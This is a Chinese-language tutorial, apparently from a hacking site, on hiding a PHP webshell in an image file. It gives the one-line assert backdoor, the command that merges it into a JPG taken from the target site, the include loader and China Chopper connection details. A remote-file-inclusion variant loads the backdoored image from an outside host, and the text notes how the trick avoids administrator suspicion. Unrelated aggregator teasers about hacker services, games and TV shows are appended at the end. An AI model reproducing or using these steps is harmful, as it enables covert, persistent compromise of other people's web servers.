我们平时藏匿图片后门是什么流程呢?我们来看一下
1、建立一个eval.php文件,上面加入我们的后门:
1 | <?phpassert($_POST[feiji]);?> |
2、找一张图片1.jpg,更好是从目标网站上下载下来的图片。
3、合并图片和php后门:
1 | Copy/bC:\xampp\htdocs\images\1.jpg+C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg |
4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:
1 | <?phpinclude(‘2.jpg’);?> |
5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。
访问图片正常:
访问images.php页面出现乱码,但是后门已经正常运行:
但是一句话在菜刀里是可以解析成功的:
注:省去第3步也是可以的,只不过直接访问图片会乱码,会让管理员起疑心。
1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵Apache和修改php.ini文件:
修改ini的配置选项allow_url_fopen和allow_url_include为ON。
2、创建任何一个php文件中,以images.php为例,写入以下的代码:
1 | <?php$filename=$_GET['feiji'];include($filename);?> |
3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上,在菜刀里添加一句话后门:
http://127.0.0.1/images/images.php?feiji=https://www.hack56.com/images/ohtg1ki141p.jpg密码为feiji
注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。
怎么找黑客做事相关问题 黑客数码壁纸相关问题 顶级黑客能厉害到什么程度 游戏专用身份证号码18岁(身份证号码游戏注册用)...
我们办公室有个很爱“吃鸡”的妹子,基本每天下班回去都要开黑一把,她自己都说这莫名就成了标准的睡前运动。 回想吃鸡,也不知道这个梗是怎么火起来的,感觉就是睡一觉起来,全世界都在吃鸡了,赶脚跟不上这些小...
在上期节目中,《青春有你2》公布了第10到59人的排名,并且淘汰了60名之后的训练生,虽然上期节目知道了哪些人进入前九名,但是具体的排名则未曾公布。如今,在最新一期节目中前九名终于公布,引发网友的广泛...
在阿里巴巴课程中,罗老师曾讲过,用户在阿里首页找产品时,一般会通过关键词进行搜索。关键词的设置和搭配是网销宝产品推广中密不可分的一部分,好的关键词设置能增加产品的展现和点击、成交的机会。 有广告字样...
文/小雨说西游 金蝉子被贬下凡的真正原因是啥?现在很多人还在犯,难怪如来要撒谎! 看过《西游记》的朋友都知道,唐僧的前世乃是如来座下的二弟子,按照佛祖的说法,因为金蝉子在如来讲经的时候轻慢佛教...
如何取消呼叫转移(手机被恶意呼叫转移) 图为朱女士的手机截图 据《长江日报》5月3日报道(记者孙)近日,有网友朱向长江网武汉市留言板举报,有陌生人设置了来电转发功能,将来电转接到自己的号码上。在过...